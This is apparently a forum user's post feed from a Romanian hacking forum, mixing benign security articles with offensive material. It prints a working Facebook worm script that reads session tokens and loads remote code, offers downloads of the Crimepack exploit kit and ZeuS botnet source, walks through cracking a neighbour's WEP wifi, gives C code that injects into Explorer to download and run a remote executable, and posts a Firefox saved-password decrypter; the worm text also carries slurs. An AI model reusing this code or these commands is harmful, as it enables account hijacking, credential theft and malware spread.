Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    706

 Content Type 

Everything posted by Nytro

  1. Nytro
    Data Execution Prevention (DEP) Systems and Network Analysis Center Information Assurance Directorate Computer attackers commonly use buffer overflow exploits to gain access to computer systems. Many of these malicious code exploits can be prevented with Data Execution Prevention (DEP), a security feature available in modern operating systems. DEP provides protection for all memory that is not specifically marked as executable code. This guide discusses how to configure and enable DEP. Download: http://www.nsa.gov/ia/_files/factsheets/I733-TR-043R-2007.pdf
  2. Nytro
    Da, e interesanta ideea. Dar proiectul in sine ar fi destul de complicat. Trebuie selectate elegant calculatoarele care vor crackui md5-urile (initial ar fi de ajuns), trebuie luate in considerare toate posibilitatile: daca un calculator trebuie sa faca 1.000.000 de incercari si face decat una? Daca se intrerupe conexiunea apoi revine? Ar fi ceva de munca.
  3. Nytro
    Script that gives hackers access to user accounts floods Facebook A widespread hack spread across Facebook early Thursday morning and shows no signs of abating as of yet. It comes in the form of a script that posts heavily profanity-laden wall posts continuously, instructing you that the only way to remove the posts is to click a ‘Remove This App’ link. Unfortunately the link is a hoax and allows the malicious script to access your Facebook account. Your account will then continue to spread the script in the form of similarly formatted wall posts on your friends accounts. The message uses the phrase ‘Vote for Nicole Santos’, leading some to believe that it is a high school prank related to Prom season. Here is a link (Fuck you faggot. Go kill yourself. Vote for Nicole Santos. I hate you and the only way to remove all these posts is by disabling this below. - Pastebin.com) to the raw code of the script causing the problems on Facebook. If any of you commenters have any suggestions as to how this might have been injected in the first place please do let us know. Script: var message = "Fuck you faggot. Go kill yourself. Vote for Nicole Santos. I hate you and the only way to remove all these posts is by disabling this below."; var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://dl.dropbox.com/u/10505629/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();"; var myText = "Remove This App"; var post_form_id = document.getElementsByName('post_form_id')[0].value; var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var friends = new Array(); gf = new XMLHttpRequest(); gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false); gf.send(); if(gf.readyState!=4){ }else{ data = eval('(' + gf.responseText.substr(9) + ')'); if(data.error){ }else{ friends = data.payload.entries.sort(function(a,{return a.index-b.index;}); } } for(var i=0; i<friends.length; i++){ var httpwp = new XMLHttpRequest(); var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1"; var paramswp = "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) + "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) + "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + "&user_message=" + message; httpwp.open("POST", urlwp, true); httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); httpwp.setRequestHeader("Content-length", paramswp.length); httpwp.setRequestHeader("Connection", "keep-alive"); httpwp.onreadystatechange = function(){ if (httpwp.readyState == 4 && httpwp.status == 200){ } } httpwp.send(paramswp); } alert("Failed to remove. Go fuck yourself with a cactus."); document.location = "profile.php?id=100000583908715"; Unsurprisingly many are trying to trace the source back to the ‘Nicole Santos’ that may have originated it, although it’s unclear whether this person would be the originator or just a victim of the hack. As of now the only solution seems to be not to click on the link or any link requiring that you ‘Verify you account to prevent spam’ as this may be how the hack gains access to your Facebook wall in the first place. Simply block the friend sending it to you as their account is now compromised. Once the problem has been fixed by Facebook you can re-enable them. We will continue to update you on the hack and it’s effects, check back with this post for more information Sursa: Script that gives hackers access to user accounts floods Facebook ! ~ THN : The Hackers News
  4. Nytro
    Crimepack 3.1.3 Exploit kit Crimepack 3.1.3 Exploit kit Leaked, available for Download ! Part 1: Java Exploit As stated above, I focus on a malware that exploits a recent JRE vulnerability: CVE-2010-0840 to execute malicious files on a victim system. This malware comes inside a jar file, which contains the following two classes: Crimepack.class and KAVS.class. Part 1.1: Crimepack.class This class is the engine of the malware, it is obfuscated, but you can quickly strip off the obfuscation (my python beta tool is great…), once you get rid of the obfuscation you can see the following code: As always, we have an Applet that access to the data parameter, generates a random name for the exe payload that will be dropped in the system temp directory and then executed. So at this point as you can see we have nothing new, the above is a common Java downloader… but let’s scroll down: Above, we can see that the malware is creating a new instance of the KAVS class (description follows), in order to trigger the JRE vulnerability by using a call to the getValue() method (..snipped above..). Part 1.2: KAVS.class Here is the hand-crafted class, I say hand-crafted because such class cannot be compiled by using a standard compiler, so you have to edit the compiled class by editing the bytecode: Part 2: PDF-generator on demand The kit contains a nice php script that drops custom pdf on-demand, which means that you can have several mutations of the same piece of malware, by simply connecting to a malicious link. Download: http://www.multiupload.com/3HGKHWMRS5 Sursa: Crimepack 3.1.3 Exploit kit Leaked, available for Download ! ~ THN : The Hackers News Alternativ: http://www.speedyshare.com/files/28425214/Crimepack_3.1.3.zip http://www.megaupload.com/?d=THZ8OW23
  5. Nytro
    Assembley lanugage for Penetration Testers Assembley lanugage for Penetration tester Below are the useful resources to learn Assembley Language for pentesters to start learning Exploit writing Assembly - SkullSecurity Linux Assembley Linux Assembly Programming From the Ground Up Index of /releases/pgubook Iczelion’s Win32 Assembly Homepage Iczelion's Win32 Assembly Homepage Art of Assembly Art of Assembly Language Programming and HLA by Randall Hyde first 5 chapters is enough Intel Developer Manuals Intel® 64 and IA-32 Architectures Software Developer's Manuals Assembly Language Primer for Hackers Videos Assembly Primer for Hackers (Part 1) System Organization Assembly Primer For Hackers (Part 1) System Organization Assembly Primer for Hackers (Part 2) Virtual Memory Organization Assembly Primer For Hackers (Part 2) Virtual Memory Organization Assembly Primer for Hackers (Part 3) GDB Usage Primer Assembly Primer For Hackers (Part 3) Gdb Usage Primer Assembly Primer for Hackers (Part 4) Hello World Assembly Primer For Hackers (Part 4) Hello World Assembly Primer for Hackers (Part 5) Data Types Assembly Primer For Hackers (Part 5) Data Types Assembly Primer for Hackers (Part 6) Moving Data Assembly Primer For Hackers (Part 6) Moving Data Assembly Primer for Hackers (Part 7) Working with Strings Assembly Primer For Hackers (Part 7) Working With Strings Assembly Primer For Hackers (Part 8) Unconditional Branching Assembly Primer for Hackers (Part 9) Conditional Branching Assembly Primer For Hackers (Part 9) Conditional Branching Assembly Primer for Hackers (Part 10) Functions Assembly Primer For Hackers (Part 10) Functions Assembly Primer for Hackers (Part 11) Functions Stack Assembly Primer For Hackers (Part 11) Functions Stack Sursa: Assembley Language | Life of a Penetration Tester
  6. Nytro
    Sa decripteze sau sa crack-uiasca hash-uri ca md5?
  7. Nytro
    Eu o sa ajung pe la 8.
  8. Nytro
    Se incearca gasirea autorului in functie de modul in care acesta scrie codul. Se pare ca e profesionist, desigur... http://www.thehackernews.com/2011/05/fingerprinting-author-of-zeus-botnet.html
  9. Nytro
    Niciuna. Sunt prezentate niste extensii ale compilatorului GCC care fac viata mai usoara. Citeste macar o parte din articol. De exemplu sa definesti "1 ... 10" care sa reprezinte orice numar de la 1 la 10. Asta nu se poate in Visual C++ de exemplu si NU face parte din standardul C!
  10. Nytro
    nytro@rst:~$ ls -la /var/log/auth.log -rw-r--r-- 1 syslog adm 1516 2011-05-12 17:20 /var/log/auth.log Vad ca e "citibil" de catre oricine...
  11. Nytro
    GCC hacks in the Linux kernel Discover GCC extensions for the C language Skill Level: Intermediate M. Tim Jones Consultant Engineer Emulex Corp 18 Nov 2008 The Linux® kernel uses several special capabilities of the GNU Compiler Collection (GCC) suite. These capabilities range from giving you shortcuts and simplifications to providing the compiler with hints for optimization. Discover some of these special GCC features and learn how to use them in the Linux kernel. GCC and Linux are a great pair. Although they are independent pieces of software, Linux is totally dependent on GCC to enable it on new architectures. Linux further exploits features in GCC, called extensions, for greater functionality and optimization. This article explores many of these important extensions and shows you how they're used within the Linux kernel. GCC in its current stable version (version 4.3.2) supports three versions of the C standard: • The original International Organization for Standardization (ISO) standard of the C language (ISO C89 or C90) • ISO C90 with amendment 1 • The current ISO C99 (the default standard that GCC uses and that this article assumes) Note: This article assumes that you are using the ISO C99 standard. If you specify a standard older than the ISO C99 version, some of the extensions described in this article may be disabled. To specify the actual standard that GCC uses, you can use the -std option from the command line. Use the GCC manual to verify which extensions are supported in which versions of the standard (see Resources for a link). Applicable versions This article focuses on the use of GCC extensions in the 2.6.27.1 Linux kernel and version 4.3.2 of GCC. Each C extension refers to the file in the Linux kernel source where the example can be found. The available C extensions can be classified in several ways. This article puts them in two broad categories: • Functionality extensions bring new capabilities from GCC. • Optimization extensions help you generate more efficient code. Download: http://download.boulder.ibm.com/ibmdl/pub/software/dw/linux/l-gcc-hacks/l-gcc-hacks-pdf.pdf Online: http://www.ibm.com/developerworks/linux/library/l-gcc-hacks/index.html
  12. Nytro
    Slackware 13.37 It's true! Slackware 13.37 has been released. Nearly a year in the making, you will appreciate the performance and stability that can only come with careful and rigorous testing. Slackware 13.37 uses the 2.6.37.6 Linux kernel (hence our new $SLACKWARE_VERSION.$KERNEL_VERSION naming system used for this release ;-), and also ships with 2.6.38.4 kernels for those who want to run the latest (and also includes configuration files for 2.6.35.12 and 2.6.39-rc4). The long-awaited Firefox 4.0 web browser is included, the X Window System has been upgraded (and includes the open source nouveau driver for nVidia cards). The venerable Slackware installer has been improved as well, with support for installing to btrfs (for those who would like to try a new copy on write filesystem), a one-package-per-line display mode option, and alienBOB's big surprise: an easy to set up PXE install server that runs right off the DVD! More details may by found in the official announcement and in the release notes. For a complete list of included packages, see the package list. Please consider supporting the Slackware project by picking up a copy of the Slackware 13.37 release from the Slackware Store. The discs are off to replication, but we're accepting pre-orders for the official 6 CD set and the DVD. The CD set is the 32-bit x86 release, while the DVD is a dual-sided disc with the 32-bit x86 release on one side and the 64-bit x86_64 release on the other. And, we still have T-shirts (coming soon, a limited edition 13.37 release commemorative black T-shirt with the classic Slackware logo on the front, and a "leet" LILO bootscreen on the back) and other Slackware stuff there, so have a look around. Thanks to our subscribers and supporters for keeping Slackware going all these years. Thanks are again due to the Slackware crew, the developers of slackbuilds.org, the community on linuxquestions.org, Slackware IRC channels, and everyone else who helped out with this release. Have fun, and enjoy the new stable release! Pat and the Slackware crew Oh, in case our web server that's rather short of RAM goes down, try this link: 1337 Error +--------------------------+ Slackware 13.37 for ARM is also available. For details, see: start [slackware ARM] Sursa: The Slackware Linux Project
  13. Nytro
    Introduction to Network Security Toolkit (NST) The Network Security Toolkit (NST) is a ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. The majority of tools published in the article: Top 100 Security Tools by INSECURE.ORG are available in the toolkit. Some of the tools available in this live are: Ntop, wireshark, nmap with the vizualization tool ZenMap and kismet. Many tasks that can be performed within NST are available through a web interface called NST WUI. Among the tools that can be used through this interface are nmap with the vizualization tool ZenMap, ntop, a session manager for VNC, a minicom-based terminal server, serial port monitoring, and WPA PSK management. You can read some of my articles about Nmap and Ntop following the links, for Nmap you got also Zenmap. Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database. On NST are also available Nagios and Argus, 2 software that can be used for network monitoring, you can check the status of various services, like web server, pop/imap mails erver or other services that in general you can test directly with a network connection. Another feature nice, and really “scenic” is that NST includes visualization of ntop, wireshark, traceroute and kismet data by geocoding the host addresses and displaying them via Google Earth. For this NST use a custom tool: nstgeolocate — Geolocate hosts obtained from an ‘ntop’ session or Geolocate IPv4 Address conversations from a network packet capture file on a Mercator World Map projection or Global imagery. There is also a browser-based packet capture and protocol analysis system capable of monitoring up to four network interfaces using Wireshark, as well as a Snort-based intrusion detection system with a “collector” backend that stores incidents in a MySQL database. For web developers, there is also a JavaScript console with a built-in object library with functions that aid the development of dynamic web pages. A great guide on what is available on the live distro and how to use each tools it’s present of the official wiki Conclusions This live CD it’s really filled with security tools and utility, so it could be really useful to set up in few minutes a location where you can do a security audit of a network or some hosts. It’s also really interesting the option to put it on a virtual machine, on the wiki there is a good how to on how to put NST on Virtualbox. So in few words: try and use it for your security audit, you’ll be satisfied for sure. Link: http://sourceforge.net/projects/nst/ Sursa (+video): » Linuxaria Introduction to Network Security Toolkit (NST)
      • 1
      • Downvote
  14. Nytro
    Practical Android Attacks Bas Alberts + Massimiliano Oldani Immunity Inc. Attack Surface ? Remote: gain access ? Browser – WebKit ? Phone – Telephony stack ? Local: elevate privileges ? Kernel – Device drivers ? Userland – Zygote, ADBd, udev, etc Download: https://www.immunityinc.com/infiltrate/presentations/Android_Attacks.odt.pdf
  15. Nytro
    Local File Inclusion to Remote Command Execution using SSH May 9th, 2011 at 21:15 by lanmaster53 Log poisoning has been used for years to upgrade local file inclusion vulnerabilities to remote command execution. In most cases, web server logs are used to execute such an attack. Most admins have become wise to the technique and do a decent job of preventing this. However, an equal amount of attention is not always paid to authentication logs. I was recently attempting to exploit a LFI vulnerability on a pen test and was having no luck poisoning the web server logs. Previous scans of the target showed that an OpenSSH service was running. I took one last shot at the LFI vulnerability and below was the result. I was shocked to find that auth.log was world readable. By default, OpenSSH makes an entry (consisting of the user name and other data) to auth.log for every authentication attempt made to the ssh daemon. Knowing this, I did some quick testing and found that I could inject php code into auth.log from the user name field of an ssh client by attempting to authenticate. The command took some time to get working right as bash requires finesse for processing special characters, but after some troubleshooting, I came up with the following: One issue I encountered is that OpenSSH makes 3 entries containing the user name to auth.log for every authentication attempt. In the following example, only one authentication attempt was made, but, as you can see, it appears in the log 3 times. The injected command will run 3 times unless php execution is terminated after the 1st command. I did this above with the exit; command. The unfortunate side effect is that you have one chance to get this right. Otherwise, you have to wait until the log cycles before you can make another attempt. Here is what the final product looked like with the addition of a pre-format tag for aesthetics. Sursa: Local File Inclusion to Remote Command Execution using SSH « LaNMaSteR53.blog Simplu si eficient
  16. Nytro
    NoVirusThanks File Governor Easily unlock locked files and folders. File Governor is an advanced program which allows for files and folders within the system to be unlocked so that normal file I/O operations can be completed when normally they would not be able to be due to operating system restrictions for files currently in use. Once a file or folder is unlocked you will be able to force-close the file’s handle, rename, delete etc. File Governor is compatible with the following 32-bit and 64-bit Microsoft Windows Operating Systems: Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 Screenshots Features Compatible with 32 & 64 bit OS Copy File to a User-Specified Directory Explorer Context Menu No Kernel Driver Needed Rename File to a User-Specified Filename Search for Locked Files Terminate Processes Unload DLL Unlock ALL Locked Files Unlock Single File Very user-friendly GUI Download: http://downloads.novirusthanks.org/files/filegovernor_setup.exe Portable: http://downloads.novirusthanks.org/files/portables/filegovernor_portable.zip Sursa: NoVirusThanks File Governor - Anti Rootkit and Anti Malware – Security Software and Services - NoVirusThanks
  17. Nytro
    Finally Source code of ZeuS Botnet Version: 2.0.8.9 available for Download ! Download: http://krash.in/real2/zeus.rar http://www.multiupload.com/P8QUNF4YJN Password: zeus Sursa: Finally Source code of ZeuS Botnet Version: 2.0.8.9 available for Download ! ~ THN : The Hackers News Alternativ: http://www.megaupload.com/?d=LTJR7DHO https://rapidshare.com/files/461898687/ZeuS_2.0.8.9.zip http://uploading.com/files/626ff4fc/ZeuS%2B2.0.8.9.zip/
  18. Nytro
    Clickjacking Paper Paul Stone, a consultant at Context, has conducted research into Clickjacking and produced a white paper which was premiered at Black Hat 2010, in a talk of the same title – Next Generation Clickjacking. Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe. Although it has been two years since the concept was first introduced, most websites still have not implemented effective protection against clickjacking. In part, this may be because of the difficulty of visualising how the technique works in practice. Download: http://www.contextis.com/resources/white-papers/clickjacking/Context-Clickjacking_white_paper.pdf
  19. Nytro
    Two Zero Day Flaws Used To Bypass Google Chrome Security May 10, 2011 | 02:02 PM By Kelly Jackson Higgins Dark Reading French researchers say they hacked their way out of browser's sandbox, bypassed DES and ASLR Researchers at French firm VUPEN Security yesterday posted a video of a hack they say they executed using two zero-day vulnerabilities in Google's Chrome browser that successfully bypassed its sandbox and other security features. VUPEN—which withheld technical details of the bugs in its disclosure--had not disclosed the bugs or any details to Google as of this posting. The security firm provides details of vulnerabilities it discovers to its paying government customers. "We did not publicly disclose any technical details of the vulnerabilities for security reasons. We did not send the technical details of the vulnerabilities to Google, and Google did not ask us to provide these details," says Chaouki Bekrar, CEO and head of research at VUPEN. A Google spokesperson said in a statement that without any details on the hack, the company is unable to verify it. "We're unable to verify VUPEN's claims at this time as we have not received any details from them. Should any modifications become necessary, users will be automatically updated to the latest version of Chrome," the spokesperson said. Chrome's sandbox features, which runs an application in a restricted environment to protect the system, as well as the use of ASLR and DEP, had made the browser relatively impenetrable to hackers. Adobe also uses Chrome's sandboxing technology, but VUPEN's Bekrar says Adobe's software is not vulnerable to the new hack. Bekrar says VUPEN employed two different bugs its researchers discovered: one that's exploited inside the sandbox, and one that's executed outside of it. "The first one results from a memory corruption leading to the execution of the first payload as low integrity level, inside the sandbox," he says. "A second payload is then used to exploit another vulnerability which allows the bypass of the sandbox and execution of the final payload with medium-integrity level, outside the sandbox." The exploit, demonstrated here using Chrome v11.0.696.65 on Microsoft Windows 7 SP1 (x64), with the user being lured to visit a malware-rigged web page, also bypasses Microsoft's Address Space Layout Randomization (ASLR) security function and Data Execution Prevention (DEP) attack mitigation feature, and works on all Windows systems including Windows 7 Service Pack (SP) 1, Windows Vista SP2, and Windows XP SP3, according to Bekrar. Microsoft's ASLR protects Windows from an exploit attempting to call a system function: it places code in random areas of memory that make it more difficult for an attacker to run malware on a machine. DEP prevents an exploit from directly injecting and executing code from sections of memory used for data. VUPEN Security early last year said it was able to bypass DEP on IE 8 and execute arbitrary code, and that it had sent its exploit code to Microsoft to examine. Other vendors have demonstrated DEP and ASLR bypass attacks: Core Security Technologies discovered a flaw in Microsoft's Virtual PC hypervisor that can be used by an attacker to cheat DEP and ASLR. And independent researcher Peter Vreugdenhil at CanSecWest 2010 waged a heap overflow attack on IE 8 and used a zero-day vulnerability he discovered in the browser to bypass Windows 7's built-in anti-exploit features, Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). VUPEN's Bekrar says it took the researchers "many weeks" to find a way to bypass Chrome's sandbox. "Chrome has probably the most secure sandbox in the market, and it took us many weeks to find a way to bypass it," he says. "We have been looking into its whole attack surface and features to find a hole allowing the escape from the sandbox." Anup Ghosh, founder and chief scientist at Invincea, says it's no surprise that the sandbox was hacked. "We always knew from the very beginning, while an internal sandbox is a good idea, architecturally, you've still got a lot of residual attack space within the browser," Ghosh says. "It's always just been a question of when it would happen." And the hack highlights just how the sandbox—albeit an extra layer of security—is still just another piece of software that has vulnerabilities of its own, experts say. "Like other security features such as ASLR, sandboxes are very important as they make exploitation much harder and mitigate threats, however a sandbox is not unbreakable as it is itself a piece of software which can be affected by vulnerabilities," Bekrar says. Invincea's Ghosh says he expects the vulnerabilities to be exploited -- initially by sophisticated attackers targeting specific organizations, and then eventually, by organized crime syndicates. "I have no doubt that this vulnerability will be exploited. The fact that they are not making it public makes it far more valuable," he says. Meanwhile, there are no ways for Chrome users to protect themselves from these types of attacks. Sursa: http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/229403161/two-zero-day-flaws-used-to-bypass-google-chrome-security.html
  20. Nytro
    Am uitat sa precizez sursa, am actualizat primul post.
  21. Nytro
    How To Crack WEP using Backtrack w/Pictures Author: Warlock This tutorial is strictly educational, neither I, nor leetcoders is responsible for whatever trouble you may get into by using this method. Tinypic killed a couple of my images, I'm sure you can still manage to do it. Welcome to my tutorial, by the end of this tutorial, you should be able to have cracked your (or your nearby neighbors) WEP encrypted wifi. What you need: Backtrack 3 or 4 (In this tutorial I used 3, since I had it laying around) Which you can get here; Downloads A computer with a compatible wireless card (if you have a newer computer, this will most likely work on your machine) Patience Assuming you've already downloaded backtrack, and burned it using your favorite burning software, restart your computer with the backtrack disc, since it can be used as a livecd. First of all, before you do anything, navigate to the wireless assistant; Start>Internet>Wireless Assistant If you do not see any networks, then this will not work for you. Open the konsole, which is here; Now type, airmon-ng It should show you your wireless card's info, like so; Now type airmon-ng stop (your interface) Should show you this; Now type ifconfig (your interface) down Then type macchanger --mac 00:11:22:33:44:55 (your interface) This spoofs your mac address, so your victim cannot figure out who you are. Type airodump-ng (your interface) This will open up a new konsole. Once you see the network you want to attack, press CTRL+C (This will stop your wirless card from searching for new networks) Open a new konsole Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface) Like so; It will open up yet another konsole. Now let it run for a few minutes (until it reaches about 5000 or so packets, the more the better chance of cracking it.) Go watch a video on youtube, or go on HF, any network activity will increase the amount of packets you pickup. Open another konsole and type aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface) Type aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface) Let it run for about 5 minutes, while it collects the packets. Then press CTRL+C Now type aircrack-ng -b (bssid) (filename-01.cap) You have found the WEP key, mine being 77838557744334834238286364 (without the colons) And you're done! ~Warlock Sursa: LeetCoders
  22. Nytro

    Fwb++

    Nytro posted a topic in Programare

    FWB++ FWB++ example by r3l4x[] (FWB stands for Firewall Bypass) /* Coder:Anskya,r3l4x[] */ #pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078 /FILEALIGN:0x200") #pragma comment(linker,"/OPT:NOWIN98 /BASE:0x13140000 /INCREMENTAL:NO") #pragma comment(linker,"/ENTRY:Entrypoint /MERGE:.rdata=.text /MERGE:.data=.text") #pragma comment(lib, "urlmon.lib") #include <windows.h> unsigned long inject (void *) { URLDownloadToFile(0, "htt://Www.Anskya.Net/Test.exe", "C:\\xx.exe", 0, 0); WinExec("C:\\xx.exe", SW_SHOW); ExitThread(0); return 0; } void Entrypoint() { DWORD Size; PBYTE module; HANDLE process; DWORD PID; LPVOID NewModule; module = (PBYTE)GetModuleHandle(0); Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage; GetWindowThreadProcessId(FindWindow("shell_traywnd", NULL), &PID); process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID); VirtualFreeEx(process, module, 0, MEM_RELEASE); NewModule = VirtualAllocEx(process, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); WriteProcessMemory(process, NewModule, module, Size, NULL) CreateRemoteThread(process, 0, 0, (unsigned long(__stdcall *)(void *))inject, module, 0, NULL); } Sursa: LeetCoders
  23. Nytro
    Morphine Packer (C++ version) Author: holyfather This is a C/asm port to the original delphi code. Download: http://www.megaupload.com/?d=PU3FCSNN Sursa: http://leetcoders.org/showthread.php?t=167
  24. Nytro

    FF pass Decrypt

    Nytro posted a topic in Programare

    FF pass Decrypt Firefox Password Decrypter by KriPpLer //----------------------------------------------------------------------- //////////////////////////////////////////////////////////// // Description: Firefox Password Cache Decrypter // Versions: Firefox 1, 2, and 3 // Author: KriPpLer // Language: C // Released: 9/9/2008 // URL: http://www.krippler.com/ /////////////////////////////////////////////////////////// // Credit: http://securityxploded.com/ (FF 2 Source) // Original Source: http://nagmatrix.50webs.com/download/Firepassword_src.zip //////////////////////////////////////////////////////////// //----------------------------------------------------------------------- #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #include <userenv.h> #pragma comment(lib,"userenv.lib") //----------------------------------------------------------------------- //Firefox internal SEC structures typedef enum SECItemType { siBuffer = 0, siClearDataBuffer = 1, siCipherDataBuffer = 2, siDERCertBuffer = 3, siEncodedCertBuffer = 4, siDERNameBuffer = 5, siEncodedNameBuffer = 6, siAsciiNameString = 7, siAsciiString = 8, siDEROID = 9, siUnsignedInteger = 10, siUTCTime = 11, siGeneralizedTime = 12 }; struct SECItem { SECItemType type; unsigned char *data; unsigned int len; }; typedef enum SECStatus { SECWouldBlock = -2, SECFailure = -1, SECSuccess = 0 }; //----------------------------------------------------------------------- //Removes gecko-sdk dependency #define PRBool int #define PRUint32 unsigned int #define PR_TRUE 1 #define PR_FALSE 0 //Mozilla library names #define NSS_LIBRARY_NAME "nss3.dll" #define PLC_LIBRARY_NAME "plc4.dll" #define NSPR_LIBRARY_NAME "nspr4.dll" #define SQLITE_LIBRARY_NAME "sqlite3.dll" #define MOZCRT_LIBRARY_NAME "mozcrt19.dll" #define NSSU_LIBRARY_NAME "nssutil3.dll" #define NSSU_LIBRARY_NAME "nssutil3.dll" #define PLDS_LIBRARY_NAME "plds4.dll" #define SOFTN_LIBRARY_NAME "softokn3.dll" #define LOADLIBRARY(x) LoadLibrary(x) #define GETPROCADDRESS GetProcAddress #define FREELIBRARY FreeLibrary //----------------------------------------------------------------------- const int buflen = 10240; static char readbuf[buflen+1]; static int last = 0; static int next = 0; typedef struct PK11SlotInfoStr PK11SlotInfo; // NSS Library functions typedef SECStatus (*NSS_Init) (const char *configdir); typedef SECStatus (*NSS_Shutdown) (void); typedef PK11SlotInfo * (*PK11_GetInternalKeySlot) (void); typedef void (*PK11_FreeSlot) (PK11SlotInfo *slot); typedef SECStatus (*PK11_CheckUserPassword) (PK11SlotInfo *slot,char *pw); typedef SECStatus (*PK11_Authenticate) (PK11SlotInfo *slot, PRBool loadCerts, void *wincx); typedef SECStatus (*PK11SDR_Decrypt) (SECItem *data, SECItem *result, void *cx); // PLC Library functions typedef char * (*PL_Base64Decode)( const char *src, PRUint32 srclen, char *dest); // Function declarations.. void NSSUnload(); int InitFFLibs(char *firefoxPath); int InitializeNSSLibrary(char *profilePath, char *password); int CheckMasterPassword(char *password); int DirectoryExists( char *path ); void StrLwr(char *str); int OpenFile(char *filePath); void CloseFile(); int ReadLine(char *buffer, int size); char *GetFFProfilePath(); char *GetFFLibPath(); char *GetFFVersion(); char **Explode(char *StrIn,const char *Delimiter); char *Split(char *String,char Delimeter[],int Part); char *replace(char *str, const char *substr, const char *repstr); char ReadChar(); char Vers[_MAX_PATH] = ""; int version = 1; int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen); int Base64Decode(char *cryptData, char **decodeData, int *decodeLen); //----------------------------------------------------------------------- NSS_Init NSSInit = NULL; NSS_Shutdown NSSShutdown = NULL; PK11_GetInternalKeySlot PK11GetInternalKeySlot = NULL; PK11_CheckUserPassword PK11CheckUserPassword = NULL; PK11_FreeSlot PK11FreeSlot = NULL; PK11_Authenticate PK11Authenticate = NULL; PK11SDR_Decrypt PK11SDRDecrypt = NULL; PL_Base64Decode PLBase64Decode = NULL; int IsNSSInitialized = 0; HMODULE libnss = NULL; HMODULE libplc = NULL; HMODULE libtmp = NULL; FILE *signonFile = NULL; //----------------------------------------------------------------------- int OpenFile(char *filePath) { last = next = 0; signonFile = fopen(filePath, "r"); if( signonFile == NULL ) { return 0; //fail } return 1; } //----------------------------------------------------------------------- char ReadChar() { if (next >= last) { next = 0; last = fread(readbuf, 1, buflen, signonFile); if (last <= 0 ) { return 0; } } return (readbuf[next++]); } //----------------------------------------------------------------------- int ReadLine(char *buffer, int size) { unsigned int c; int strLength = 0, i=0; buffer[0] = 0; while(1) { c = ReadChar(); // eof reached if ( c == 0 ) // || feof(file) ) return 0; if (c == '\n') { buffer[strLength++] = 0; break; } if (c != '\r') { for(i=0; i < 4 && ( (c & 0xff) != 0 ) ; i++) { if( strLength >= size ) { printf("\n Buffer is insufficient to store data"); return 0; } // Increase buffer capacity dynamically buffer[strLength++] = (char)c; c = c >> 8; } } } return 1; } //----------------------------------------------------------------------- //Misc functions int DirectoryExists( char *path ) { DWORD attr = GetFileAttributes(path); if( (attr < 0) || !(attr & FILE_ATTRIBUTE_DIRECTORY ) ) { return 0; } return 1; } //----------------------------------------------------------------------- void StrLwr(char *str) { int n=strlen(str); for(int i=0; i<n; i++) { if( str[i] >=65 && str[i]<=90 ) str[i]+=32; } } //----------------------------------------------------------------------- //Loads specified firefox library with the given ffdir path as root HMODULE LoadLibrary(char *firefoxDir, char *libName) { char loadPath[4096]=""; strcpy(loadPath, firefoxDir); strcat(loadPath, "/"); strcat(loadPath, libName); libtmp = LOADLIBRARY(loadPath); if( !libtmp ) { return 0; //Failed to load library } return libtmp; } //----------------------------------------------------------------------- int InitFFLibs(char *FFDir) { libnss = libplc = NULL; //Load all required dll's if( FFDir != NULL ) { //Minor version check if(!LoadLibrary(FFDir, MOZCRT_LIBRARY_NAME)) //We are using version 2 or lower { goto version2; } else { if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLC_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, NSSU_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, SQLITE_LIBRARY_NAME) ) { } } } } } } version2: if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) ) { if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) ) { if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) ) { if( LoadLibrary(FFDir, SOFTN_LIBRARY_NAME) 